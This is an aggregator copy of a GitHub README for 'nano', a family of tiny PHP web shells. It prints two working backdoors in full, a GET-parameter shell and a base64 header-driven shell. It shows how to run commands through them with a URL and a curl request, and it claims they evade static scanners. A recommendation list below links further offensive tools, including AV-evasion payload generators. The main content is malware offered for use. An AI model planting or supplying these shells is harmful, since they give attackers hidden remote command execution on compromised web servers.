

GitHub - UltimateHackers/nano: Nano is a family of PHP web shells which are code...
source link: https://github.com/UltimateHackers/nano
Go to the source link to view the article. You can view the picture content, updated content and better typesetting reading experience. If the link is broken, please click the button below to view the snapshot at that time.

README.md
nano
Nano is a family of PHP webshells which are code golfed to be extremely stealthy and efficient.
Put it on watch maybe, I will continue to upload more webshells in here.
Nano
<?$x=$_GET;($x[p]=='_'?$x[f]($x[c]):y);
Features
- 39 bytes in size
- Can't be detected by static code scanners
- Supports authentication
Usage
http://example.com/nano.php?f=function&c=command&p=password
f
is for functionc
is for commandp
is for password
For example, the code below will execute the ls
command:
http://example.com/nano.php?f=system&c=ls&p=password
Ninja
<?preg_match('/(.*)\((.*)\)/',base64_decode(substr(getallheaders()['x'],1)),$c);@$c[1]($c[2]);
Features
- 93 bytes in size
- Fully Undetectable
Usage
This one a bit complex.
Lets say you want to run system(ls)
so you will need to base64 encode it i.e. c3lzdGVtKGxzKQ==
Now add any 1 character at the start of it. Let say 'x' so it will be xc3lzdGVtKGxzKQ==
Now open your terminal and type the following commandcurl -H 'x: xc3lzdGVtKGxzKQ==' http://example.com/backdoored.php
Too much work? You can use the handler instead.
Everything Else
This is my first php thingy so if there's way to do what I did in a better way please let me know or open a pull request.
This 39 characters of code is licensed under MIT license which basically means you have to give me credit if you want to redistribute or modify it.
Recommend
-
111
Blazy Blazy is a modern login page bruteforcer.
-
161
-
109
ReconDog - Recon Dog is an all in one tool for all your basic information gathering needs.
-
103
XSStrike is an advanced XSS detection and exploitation suite.
-
127
README.md Arjun Arjun is a python script for finding hidden GET & POST parameters using regex and bruteforce. Dependencies requests threading Usa...
-
84
README.md Hue
-
63
README.md Decodify It can detect and decode encoded strings, recursively. Lets take this string : s0md3v and encode it in Base 64 czBtZDN2 Now...
-
52
README.md ShellPop About Pop shells like a master Shell pop is all about popping shells. With this tool you can generate easy and sophisticated reverse or bind shell commands t...
-
33
Base16 for Shells. Contribute to chriskempson/base16-shell development by creating an account on GitHub.
-
10
Generator Evade AV with obfuscated payloads Installation must install dotnet prior to running the script with net45 Running ./generator.py -ip <Your-IP> -port <...
About Joyk
Aggregate valuable and interesting links.
Joyk means Joy of geeK